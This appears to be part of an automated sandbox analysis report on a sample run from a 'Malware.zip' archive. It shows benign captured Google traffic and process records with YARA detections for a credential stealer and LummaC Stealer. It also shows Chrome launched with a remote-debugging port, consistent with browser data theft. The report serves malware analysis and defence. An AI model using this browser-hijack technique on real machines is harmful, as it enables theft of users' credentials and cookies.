                                                                                                                                                                                                                      Data Ascii: -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 35 39 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63
                                                                                                                                                                                                                      Data Ascii: -label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700259,3700942,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_ac
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 43 64 3b 5f 2e 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 42 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c
                                                                                                                                                                                                                      Data Ascii: e-Identifier: Apache-2.0\n*/\nvar Cd;_.Ad\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Cd\u003dfunction(a){return new _.Bd(b\u003d\u003eb.substr(0,a.length+1).toL
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1149INData Raw: 5c 75 30 30 32 36 28 4f 64 5c 75 30 30 33 64 4e 64 28 29 29 3b 72 65 74 75 72 6e 20 4f 64 7d 3b 5c 6e 5f 2e 52 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 50 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 51 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 51 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 54 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: \u0026(Od\u003dNd());return Od};\n_.Rd\u003dfunction(a){const b\u003d_.Pd();return new _.Qd(b?b.createScriptURL(a):a)};_.Sd\u003dfunction(a){if(a instanceof _.Qd)return a.i;throw Error(\"H\");};_.Ud\u003dfunction(a){if(Td.test(a))return a};_.Vd\u003dfunct
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC350INData Raw: 31 35 37 0d 0a 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 66 65 2c 6a 65 2c 62 65 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 62 65 28 5f 2e 63 65 28 61 29 29 3a 61 65 7c 7c 28 61 65 5c 75 30 30 33 64 6e 65 77 20 62 65 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30
                                                                                                                                                                                                                      Data Ascii: 157script:)(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var fe,je,be;_.de\u003dfunction(a){return a?new be(_.ce(a)):ae||(ae\u003dnew be)};_.ee\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u00
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 38 30 30 30 0d 0a 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 7a 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c
                                                                                                                                                                                                                      Data Ascii: 8000,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ge\u003dfunction(a,b){_.zb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      5192.168.2.1649714142.250.74.1964437160C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:47 UTC393OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Sec-Fetch-Storage-Access: active
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC970INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Version: 734020781
                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                      Accept-CH: Downlink
                                                                                                                                                                                                                      Accept-CH: RTT
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:48 GMT
                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                      Start time:19:41:35
                                                                                                                                                                                                                      Start date:10/03/2025
                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                      Imagebase:0x7ff791570000
                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:19:41:46
                                                                                                                                                                                                                      Start date:10/03/2025
                                                                                                                                                                                                                      Path:C:\Windows\System32\OpenWith.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                      Imagebase:0x7ff7697c0000
                                                                                                                                                                                                                      File size:123'984 bytes
                                                                                                                                                                                                                      MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:19:41:53
                                                                                                                                                                                                                      Start date:10/03/2025
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe"
                                                                                                                                                                                                                      Imagebase:0x7d0000
                                                                                                                                                                                                                      File size:6'666'240 bytes
                                                                                                                                                                                                                      MD5 hash:E1DF45DCA577E2C5941E714A0F9C32EC
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:19:42:42
                                                                                                                                                                                                                      Start date:10/03/2025
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                                                                                                                                                                                                                      Imagebase:0x7ff77eaf0000
                                                                                                                                                                                                                      File size:3'388'000 bytes
                                                                                                                                                                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                      Start time:19:42:44
                                                                                                                                                                                                                      Start date:10/03/2025
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3
                                                                                                                                                                                                                      Imagebase:0x7ff77eaf0000
                                                                                                                                                                                                                      File size:3'388'000 bytes
                                                                                                                                                                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      No disassembly